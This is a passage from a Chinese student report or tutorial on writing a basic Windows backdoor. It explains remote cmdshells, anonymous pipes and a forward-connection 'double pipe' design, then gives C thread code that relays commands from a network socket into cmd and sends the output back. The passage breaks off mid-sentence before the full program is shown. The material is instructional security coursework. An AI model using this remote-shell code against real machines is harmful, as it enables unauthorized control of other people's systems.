[2018年最新整理]基本的后门编写.docVIP

基本后门的编写 网络工程0901 张恺南 200926680125 1.1后门概述 绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段，程序员常会在软件内创建后门以便可以修改程序中的缺陷。如果后门被其他人知道，或是在发布软件之前没有删除后门，那么它就成了安全风险。后门又称为Back Door —— 一台计算机上有0到65535共65536个端口，那么如果把计算机看作是一间屋子，那么这65536个端口就可以把它看做是计算机为了与外界连接所开的65536扇门。 2.1简单cmdshell的实现 什么是cmdshell？ cmd就是系统中的cmd窗口，shell在英语中是“壳”的意思，cmdshell可以理解为是由被入侵系统返回的一个类似于cmd窗口的可以远程执行命令的模块。 本地主机 cmdshell有1和2两个不同的通信过程，要实现cmdshell，必须解决这两个通信问题。首先1过程是后门和cmd之间的通信，我们可以用管道通信技术来实现这个过程；2过程是跨越计算机的网络通信，我们可以用Winsock类库来实现。 2.2.1管道通信技术 什么是管道? 管道是一种进程间，确切地说是线程间的通信方法。管道，正如这个名字所表示的，是一个有两个端口的对象，进程可以从这个对象的一个端口写入信息，并从这个对象的另一个端口读取信息。管道其实也是一个共享内存，但是这个共享内存更加规范，而且有类似于队列的数据结构，不像内存映射文件那样仅仅是共享内存。 2.2.2正向连接后门编程 所谓正向连接后门，就是在被控制的计算机上监听一个端口,等待连接，当有连接后就启动后门功能，这又是最古老的后门。 2.2.2.1 双管道后门 所谓双管道后门，顾名思义也就是这个后门建立了两个管道。由于匿名管道是单向的，所以cmd的执行结果写入管道1的写句柄（hWritePipe），后门从管道1的读句柄（hReadFile）读取cmd的执行结果；后门把接收到的命令写入管道2的写句柄（hWriteFile），cmd通过管道2的读句柄（hReadPipe）读取命令执行。 通过CreatePipe函数建立管道，建立两个线程，每个线程建立一个管道，线程1用于循环读取管道1中的数据，一旦读到数据，就发送给控制者；线程2用于循环接受数据，一旦接受到数据就写入管道2中，由cmd来执行。 具体代码如下： //接受远程主机的命令，并写入管道2 DWORD WINAPI Thread2( LPVOID lpParam ) { SECURITY_ATTRIBUTES sa; DWORD nByteToWrite, nByteWritten; char recv_buff[1024]; sa.nLength = sizeof(SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor = NULL; sa.bInheritHandle = TRUE; //创建管道 CreatePipe(hReadPipe,hWriteFile,sa,0); while(true) { Sleep(250); //接受远程cmd命令 nByteToWrite = recv(sClient ,recv_buff,1024,0); //写入管道 WriteFile(hWriteFile,recv_buff,nByteToWrite,nByteWritten,NULL); } return 0; } //读取管道1中的数据，返回给远程主机 DWORD WINAPI Thread1( LPVOID lpParam ) { SECURITY_ATTRIBUTES sa; DWORD len; char send_buff[2048]; sa.nLength = sizeof(SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor = NULL; sa.bInheritHandle = TRUE; CreatePipe(hReadFile,hWritePipe,sa,0); while (true) { //读取管道中的数据 ReadFile(hReadFile,send_buff,2048,len,NULL); //把管道中的数据发送给远程主机 send(sClient,send_buff,len,0); } return 0; } 在主函数中我们只要调用CreateThread函数启动这两个线程就可以了。由于这两个线程是在接收连接后，但管道没有和cmd的输入输出关联时启动，所以启动后，线程1是不能从管道1中读到数据的。线程2假